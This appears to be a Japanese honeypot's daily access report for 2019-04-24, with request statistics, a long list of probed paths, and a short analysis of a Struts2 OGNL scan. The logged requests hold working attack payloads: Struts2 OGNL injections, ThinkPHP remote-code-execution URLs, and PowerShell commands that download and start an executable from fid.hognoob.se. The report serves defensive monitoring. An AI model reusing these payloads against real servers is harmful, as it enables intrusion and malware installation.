2019-04-24のアクセス数は562件でした。
■送信元IPアドレスの数は 57件です。
■メソッドの一覧と件数は以下です。
method | 総数 |
CONNECT | 4 |
GET | 261 |
HEAD | 2 |
POST | 294 |
PROPFIND | 1 |
合計 結果 | 562 |
■アクセスパス一覧と件数は以下です。
path | method | 総数 |
/ | GET | 41 |
/ | HEAD | 1 |
/ | PROPFIND | 1 |
/_404.php | POST | 1 |
/_query.php | GET | 1 |
/.php | POST | 1 |
/.well-known/security.txt | GET | 1 |
//MyAdmin/scripts/setup.php | GET | 2 |
//phpmyadmin/scripts/setup.php | GET | 2 |
//pma/scripts/setup.php | GET | 1 |
/%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_ MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess %3d%23dm)%3a((%23container%3d%23context%5b%27 com.opensymphony.xwork2.ActionContext.container%27 %5d).(%23ognlUtil%3d%23container.getInstance(%40 com.opensymphony.xwork2.ognl.OgnlUtil%40class)). (%23ognlUtil.getExcludedPackageNames().clear()). (%23ognlUtil.getExcludedClasses().clear()). (%23context.setMemberAccess(%23dm)))). (%23res%3d%40org.apache.struts2.ServletActionContext%40 getResponse()).(%23res.addHeader(%27eresult%27%2c%27 struts2_security_check%27))%7d/index.action | POST | 1 |
/%25%7b(%23dm%3d%40ognl.OgnlContext%40 DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f (%23_memberAccess%3d%23dm)%3a((%23container%3d%23 context%5b%27com.opensymphony.xwork2.ActionContext.container %27%5d).(%23ognlUtil%3d%23container.getInstance (%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)). (%23ognlUtil.getExcludedPackageNames().clear()). (%23ognlUtil.getExcludedClasses().clear()). %23context.setMemberAccess(%23dm)))). (%23res%3d%40org.apache.struts2.ServletActionContext%40 getResponse()).(%23res.addHeader(%27eresult%27%2c %27struts2_security_check%27))%7d/login.action | POST | 1 |
/099.php | POST | 1 |
/1.php | POST | 6 |
/1111.php | POST | 1 |
/12.php | POST | 1 |
/1213.php | POST | 1 |
/123.php | POST | 1 |
/1hou.php | POST | 1 |
/1ndex.php | POST | 1 |
/1q.php | POST | 1 |
/1x.php | GET | 1 |
/2.php | POST | 2 |
/3.php | POST | 1 |
/51.php | POST | 1 |
/51314.php | POST | 1 |
/520.php | POST | 1 |
/5201314.php | POST | 1 |
/56.php | POST | 1 |
/666.php | POST | 1 |
/7.php | POST | 1 |
/777.php | POST | 1 |
/92.php | POST | 1 |
/9510.php | POST | 1 |
/9678.php | POST | 1 |
/a.php | POST | 1 |
/aa.php | POST | 1 |
/aaa.php | POST | 1 |
/aaaa.php | POST | 1 |
/aaaaaa1.php | POST | 1 |
/acadmin.php | GET | 1 |
/admin-scripts.asp | GET | 2 |
/admin/index.php | GET | 1 |
/admin/mysql/index.php | GET | 1 |
/admin/mysql2/index.php | GET | 1 |
/admin/phpMyAdmin/index.php | GET | 3 |
/admin/phpmyadmin2/index.php | GET | 1 |
/admin/pma/index.php | GET | 2 |
/Administrator.php | POST | 1 |
/admn.php | POST | 1 |
/ak.php | POST | 1 |
/ak47.php | POST | 1 |
/ak48.php | POST | 1 |
/Alarg53.php | POST | 1 |
/angge.php | POST | 1 |
/aotu.php | POST | 1 |
/aotu7.php | POST | 1 |
/api.php | POST | 2 |
/app.php | POST | 1 |
/App986ca785.php | POST | 1 |
/appserv.php | GET | 1 |
/aw.php | POST | 1 |
/bak.php | POST | 1 |
/boots.php | POST | 1 |
/cacti/plugins/weathermap/editor.php | GET | 1 |
/cadre.php | POST | 1 |
/cainiao.php | POST | 1 |
/caonma.php | POST | 1 |
/cc.php | POST | 1 |
/cere.php | POST | 1 |
/ceshi.php | POST | 1 |
/cgi-bin/authLogin.cgi | GET | 1 |
/chaoda.php | POST | 1 |
/claroline/phpMyAdmin/index.php | GET | 2 |
/cmd.php | GET | 2 |
/cmd.php | POST | 1 |
/cmdd.php | GET | 1 |
/cmv.php | GET | 1 |
/cn.php | POST | 1 |
/cnm.php | POST | 1 |
/composer.php | GET | 1 |
/composers.php | GET | 1 |
/conf.php | POST | 1 |
/conf1g.php | POST | 1 |
/confg.php | POST | 4 |
/conflg.php | POST | 2 |
/coon.php | POST | 1 |
/core.php | POST | 1 |
/cxfm666.php | POST | 1 |
/d.php | POST | 1 |
/d7.php | GET | 1 |
/data.php | POST | 1 |
/db__.init.php | POST | 1 |
/db_cts.php | GET | 1 |
/db_dataml.php | POST | 1 |
/db_desql.php | POST | 1 |
/db_pma.php | GET | 1 |
/db_session.init.php | POST | 1 |
/db.init.php | POST | 1 |
/db.php | POST | 1 |
/db/index.php | GET | 1 |
/dbadmin/index.php | GET | 1 |
/default.php | POST | 1 |
/defect.php | POST | 1 |
/desktop.ini.php | GET | 1 |
/dexgp.php | POST | 1 |
/diy.php | POST | 1 |
/Drupal.php | GET | 1 |
/erba.php | POST | 1 |
/errors.php | POST | 1 |
/erwa.php | POST | 1 |
/fack.php | POST | 1 |
/favicon.ico | GET | 1 |
/fb.php | POST | 1 |
/feixiang.php | POST | 1 |
/function.inc.php | POST | 1 |
/fusheng.php | POST | 1 |
/general.php | POST | 1 |
/godkey.php | POST | 1 |
/guai.php | POST | 1 |
/h1.php | POST | 1 |
/hack.php | POST | 1 |
/hacly.php | POST | 1 |
/hell.php | GET | 1 |
/hell.php | POST | 1 |
/hello.php | POST | 2 |
/help-e.php | GET | 1 |
/help.php | GET | 1 |
/help.php | POST | 1 |
/hh.php | POST | 1 |
/hm.php | POST | 1 |
/home.php | GET | 1 |
/htdocs.php | GET | 1 |
/htfr.php | POST | 1 |
/hue2.php | GET | 1 |
/HX.php | POST | 1 |
/images/vuln.php | GET | 1 |
/index.action | POST | 7 |
/index.php | GET | 1 |
/index.php?s=/index/\think\app/invokefunction&function= call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP | GET | 1 |
/index1.php | POST | 1 |
/indexa.php | POST | 1 |
/info.php | POST | 1 |
/info1.php | POST | 1 |
/infoo.php | POST | 1 |
/infos.php | POST | 1 |
/ip.php | POST | 1 |
/izom.php | GET | 2 |
/j.php | POST | 1 |
/java.php | GET | 1 |
/knal.php | GET | 1 |
/kvast.php | POST | 1 |
/l6.php | POST | 1 |
/l7.php | POST | 1 |
/l8.php | POST | 1 |
/lala-dpr.php | GET | 1 |
/lala.php | GET | 1 |
/lang.php?f=1 | GET | 1 |
/lanke.php | POST | 1 |
/lanyecn.php | POST | 1 |
/lapan.php | POST | 1 |
/ldw.php | POST | 1 |
/liangchen.php | POST | 1 |
/libraries/joomla/jmail.php?waled=1 | GET | 1 |
/libraries/joomla/jmails.php?waled=1 | GET | 1 |
/libraries/joomla/wl.php?0=1 | GET | 1 |
/license.php | GET | 1 |
/lindex.php | POST | 1 |
/link.php | POST | 1 |
/linkr.php | POST | 1 |
/linkx.php | POST | 1 |
/linux.php | POST | 1 |
/linux1.php | POST | 1 |
/linuxse.php | POST | 1 |
/ljb.php | POST | 1 |
/lm.php | POST | 1 |
/lmn.php | POST | 1 |
/log.php | GET | 1 |
/log.php | POST | 1 |
/login.action | POST | 7 |
/logon.php | GET | 1 |
/lol.php | GET | 1 |
/lost.php | POST | 1 |
/lucky.php | POST | 2 |
/lx.php | POST | 1 |
/m.php | POST | 1 |
/m.php?pbid=open | POST | 1 |
/manager/html | GET | 46 |
/mazi.php | POST | 1 |
/MCLi.php | POST | 2 |
/meng.php | POST | 1 |
/miao.php | POST | 1 |
/min.php | POST | 1 |
/mm.php | POST | 1 |
/muhstik-dpr.php | GET | 1 |
/muhstik.php | GET | 2 |
/muhstik2.php | GET | 1 |
/muhstiks.php | GET | 1 |
/muieblackcat | GET | 1 |
/mx.php | POST | 1 |
/MyAdmin/index.php | GET | 2 |
/myadmin2/index.php | GET | 1 |
/mybestloves.php | POST | 1 |
/mysql_admin/index.php | GET | 1 |
/mysql-admin/index.php | GET | 1 |
/mysql.php | POST | 1 |
/mysql/admin/index.php | GET | 1 |
/mysql/dbadmin/index.php | GET | 1 |
/mysql/index.php | GET | 1 |
/mysql/mysqlmanager/index.php | GET | 1 |
/mysql/sqlmanager/index.php | GET | 1 |
/mysqladmin/index.php | GET | 1 |
/mz.php | POST | 1 |
/neko.php | POST | 1 |
/new_license.php | GET | 1 |
/no.php | POST | 1 |
/nuoxi.php | POST | 1 |
/okokok.php | POST | 1 |
/orange.php | POST | 1 |
/ou2.php | POST | 1 |
/p.php | POST | 1 |
/p34ky1337.php | POST | 1 |
/payload.php | GET | 2 |
/paylog.php | POST | 2 |
/pe.php | POST | 1 |
/php.php | POST | 1 |
/php2MyAdmin/index.php | GET | 1 |
/phpAdmin/index.php | GET | 2 |
/phpiMyAdmin/index.php | GET | 1 |
/phpinfi.php | POST | 1 |
/phpini.php | POST | 1 |
/phpma/index.php | GET | 1 |
/phpmy/index.php | GET | 1 |
/phpMyAbmin/index.php | GET | 1 |
/phpMyAdm1n/index.php | GET | 2 |
/phpMyadmi/index.php | GET | 1 |
/phpMyAdmin__/index.php | GET | 1 |
/phpMyadmin_bak/index.php | GET | 1 |
/phpMyAdmin-4.4.0/index.php | GET | 1 |
/phpmyadmin-old/index.php | GET | 1 |
/phpMyAdmin._/index.php | GET | 1 |
/phpMyAdmin.old/index.php | GET | 1 |
/phpMyAdmin/index.php | GET | 3 |
/phpmyadmin/phpmyadmin/index.php | GET | 3 |
/phpMyAdmin/scripts/db___.init.php | GET | 2 |
/phpmyadmin/scripts/setup.php | GET | 2 |
/phpMyAdmin+++—/index.php | GET | 1 |
/phpmyadmin0/index.php | GET | 1 |
/phpmyadmin1/index.php | GET | 2 |
/phpMyAdmin123/index.php | GET | 1 |
/phpmyadmin2/index.php | GET | 1 |
/phpmyadmin2222/index.php | GET | 1 |
/phpMyAdmina/index.php | GET | 1 |
/phpMyAdminold/index.php | GET | 1 |
/phpMyAdmins/index.php | GET | 1 |
/phpMyAdmion/index.php | GET | 1 |
/phpMydmin/index.php | GET | 1 |
/phpNyAdmin/index.php | GET | 1 |
/phppma/index.php | GET | 1 |
/phpStudy.php | POST | 2 |
/pk1914.php | POST | 1 |
/plugins/weathermap/editor.php | GET | 1 |
/pma-old/index.php | GET | 1 |
/pma.php | POST | 1 |
/pma/index.php | GET | 2 |
/PMA2/index.php | GET | 1 |
/pmamy/index.php | GET | 1 |
/pmamy2/index.php | GET | 1 |
/pmd_online.php | GET | 1 |
/pmd/index.php | GET | 1 |
/post.php | POST | 1 |
/ppp.php | POST | 1 |
/ppx.php | POST | 1 |
/program/index.php | GET | 1 |
/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20 (new-object%20System.Net.WebClient).DownloadFile (‘http://fid.hognoob.se/download.exe’, ‘C:/Windows/temp/tbtldtctbsjzqhp8813.exe’);start%20 C:/Windows/temp/tbtldtctbsjzqhp8813.exe | GET | 1 |
/public/index.php?s=/index/\think\app/invokefunction&function= call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20 $action%20=%20$_GET[‘xcmd’] | GET | 1 |
/public/index.php?s=index/think\app/invokefunction&function= call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20 /c%20powershell%20(new-object%20System.Net.WebClient). DownloadFile(‘http://fid.hognoob.se/download.exe’, ‘C:/Windows/temp/tbtldtctbsjzqhp8813.exe’);start%20 C:/Windows/temp/tbtldtctbsjzqhp8813.exe | GET | 1 |
/pwd/index.php | GET | 1 |
/python.php | POST | 1 |
/q.php | POST | 3 |
/qa.php | POST | 1 |
/qaq.php | POST | 1 |
/qaz.php | POST | 1 |
/qq.php | POST | 5 |
/qq5262.php | POST | 1 |
/qw.php | POST | 1 |
/qwe.php | POST | 1 |
/qwq.php | POST | 1 |
/qwqw.php | POST | 1 |
/repeat.php | POST | 1 |
/robots.txt | GET | 1 |
/robots.txt | HEAD | 1 |
/ruyi.php | POST | 1 |
/rxr.php | GET | 1 |
/s.php | POST | 2 |
/s/index.php | GET | 1 |
/s1.php | POST | 1 |
/scripts/setup.php | GET | 1 |
/sean.php | POST | 1 |
/sha.php | POST | 1 |
/shaAdmin/index.php | GET | 1 |
/she.php | POST | 1 |
/sheep.php | POST | 1 |
/shell.php | GET | 2 |
/shopdb/index.php | GET | 1 |
/sitemap.xml | GET | 1 |
/Skri.php | POST | 1 |
/sllolx.php | POST | 1 |
/spider.php | GET | 1 |
/ss.php | POST | 2 |
/ssaa.php | POST | 1 |
/sss.php | POST | 2 |
/super.php | POST | 1 |
/system.php | POST | 1 |
/t6nv.php | GET | 1 |
/test.php | GET | 1 |
/test.php | POST | 3 |
/test123.php | POST | 2 |
/text.php | GET | 1 |
/tiandi.php | POST | 1 |
/tmUnblock.cgi | POST | 1 |
/tomcat.php | POST | 1 |
/tools/phpMyAdmin/index.php | GET | 2 |
/toor.php | POST | 1 |
/typo3/phpmyadmin/index.php | GET | 1 |
/u.php | POST | 1 |
/undx.php | GET | 1 |
/up.php | POST | 1 |
/Updata.php | POST | 1 |
/uploader.php | GET | 1 |
/uu.php | POST | 1 |
/uuu.php | POST | 1 |
/v/index.php | GET | 1 |
/ver.php | POST | 1 |
/vuln1.php | POST | 1 |
/w.php | POST | 1 |
/wan.php | POST | 1 |
/wanan.php | POST | 1 |
/wb.php | POST | 1 |
/wc.php | POST | 1 |
/wcp.php | POST | 1 |
/web/phpMyAdmin/index.php | GET | 2 |
/webdav/ | GET | 1 |
/webslee.php | POST | 1 |
/weixiao.php | POST | 1 |
/win.php | POST | 1 |
/win1.php | POST | 1 |
/wp-admins.php | POST | 1 |
/wp-config.php | GET | 1 |
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php | GET | 1 |
/wpc.php | GET | 1 |
/wpo.php | GET | 1 |
/wshell.php | POST | 1 |
/wuwu11.php | POST | 1 |
/www.php | POST | 1 |
/www/phpMyAdmin/index.php | GET | 2 |
/x.php | GET | 1 |
/x.php | POST | 4 |
/xampp/phpmyadmin/index.php | GET | 1 |
/xiao.php | POST | 1 |
/xiaobin.php | POST | 1 |
/xiaodai.php | POST | 1 |
/xiaohei.php | POST | 1 |
/xiaoma.php | POST | 1 |
/xiaomae.php | POST | 1 |
/xiaomar.php | POST | 1 |
/xiaomo.php | POST | 1 |
/xiaoxi.php | POST | 1 |
/xiaoyu.php | POST | 1 |
/xp.php | POST | 1 |
/xshell.php | POST | 1 |
/xw.php | POST | 1 |
/xw1.php | POST | 1 |
/xx.php | POST | 2 |
/xxx.php | POST | 1 |
/xxxx.php | POST | 1 |
/xz.php | POST | 1 |
/yao.php | POST | 1 |
/yj.php | POST | 1 |
/yumo.php | POST | 1 |
/z.php | GET | 1 |
/z.php | POST | 2 |
/zshmindex.php | POST | 1 |
/zuo.php | POST | 1 |
/zuoindex.php | POST | 1 |
/zuos.php | POST | 1 |
/zuoshou.php | POST | 1 |
/zuoshss.php | POST | 1 |
/zuoss.php | POST | 1 |
/zxc0.php | POST | 1 |
/zxc1.php | POST | 2 |
/zxc2.php | POST | 1 |
/zzk.php | POST | 1 |
/zzz.php | POST | 1 |
cn.bing.com:443 | CONNECT | 1 |
http://110.249.212.46/testget?q=23333&port=80 | GET | 2 |
http://api.ipify.org/ | GET | 1 |
http://httpheader.net/ | GET | 1 |
http://www.123cha.com/ | GET | 1 |
http://www.baidu.com/ | GET | 1 |
http://www.ip.cn/ | GET | 1 |
www.baidu.com:443 | CONNECT | 2 |
www.google.com:443 | CONNECT | 1 |
気になるlog
-=-=19件目のlog=-=-
[2019-04-24 09:52:30+0900] 103.79.155.162 hoge:80 "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1" 200 False POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1 Host: hoge:80 Accept-Language: zh_CN User-Agent: Auto Spider 1.0 Accept-Encoding: gzip, deflate Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded
Struts2の脆弱性、CVE2017-9791の脆弱性である。
調査の通信っぽい。よく見るとUser Agentが”Auto Spider 1.0″になっている。
よくよく見てみると、他にもUser Agentが”Auto Spider 1.0″のlogがあり、どれもstruts2の脆弱性を狙っていた。